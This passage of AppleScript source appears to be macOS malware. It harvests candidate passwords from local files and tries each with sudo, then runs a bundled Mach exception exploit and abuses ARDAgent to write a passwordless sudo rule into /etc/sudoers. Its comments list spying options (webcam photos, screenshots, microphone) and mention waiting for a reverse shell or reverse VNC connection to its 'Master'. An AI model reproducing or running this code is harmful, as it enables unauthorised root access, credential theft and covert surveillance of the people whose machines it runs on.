set the_passwords to {the_passwords & (do shell script "grep " & quoted form of my_username & " " & quoted form of accounts_file & " 2>/dev/null | sed -e 's/^.*://g'") & return}
end try
try
set the_passwords to {the_passwords & (do shell script "cat " & quoted form of candidates_file & " 2>/dev/null") & return}
end try
try
set the_passwords to {the_passwords & (do shell script "grep -v ':' ~/Public/" & quoted form of secret_file & " 2>/dev/null") & return}
end try
set the_passwords to {do shell script "echo '" & the_passwords & "' | tr '\\r' '\\n' | sort -u "}
repeat with the_password in the_passwords
try
test_a_password_with_sudo(the_password)
exit repeat
on error error_message number error_number
--Just keep trying until I am out of possible passwords
end try
end repeat
end if
if i_have_root_access is false then
--Try some exploits
if OSX_version_number_minor as number < 4 or (OSX_version_number_minor as number ≤ 4 and OSX_version_number_mini as number < 8) then
if debug then log_event("Main: Trying MachEx")
--Attempts to run the compiled mach exception handling exploit from the Contents/Resources directory within this script's application bundle.
try
with timeout of 5 seconds
do shell script quoted form of my_resources & "/MachEx <<< \"echo '" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL' >> /etc/sudoers; exit\""
end timeout
can_sudo_come_out_to_play()
end try
end if
if debug then log_event("Main: trying to get ARDAgent to append to /etc/sudoers")
set tries to 0
repeat until tries ≥ 20
try
set tries to tries + 1
tell application "ARDAgent" to do shell script "echo '" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL' >> /etc/sudoers"
set tries to 25
can_sudo_come_out_to_play()
on error error_message number error_number
--ignore
end try
end repeat
end if
--Other stuff I could do
--take pictures - do shell script quoted form of my_resources & "isightcapture ~/public/\"$(date).jpg\""
--take screenshots - do shell script "screencapture -xmC ~/public/\"$(date).jpg\""
--Listen to the microphone?
if i_am_an_admin is false and i_have_root_access is false then
if debug then log_event("Main: i_am_an_admin is false and i_have_root_access is false")
stuff_for_a_regular_user_to_do()
end if
if i_am_an_admin is true and i_have_root_access is false then
if debug then log_event("Main: i_am_an_admin is true and i_have_root_access is not true")
stuff_for_an_admin_without_sudo_to_do()
dupe_user()
if i_have_root_access is false then alias_sudo()
end if
if i_have_root_access is true then
if debug then log_event("Main: i_have_root_access is true")
stuff_for_root_to_do()
end if
if all_else_fails then
if debug then log_event("Main: all_else_fails")
--Still to do?
--check for passwords laying around in files to which I have read access
--check for write access to setuid app paths, StartupItems, LoginItems, LaunchDaemons & Agents etc.
--go into quiet mode and just wait for sudo to work or for Master to get the reverse shell or reverse VNC connections. :)
end if
if debug then log_event("THE END")
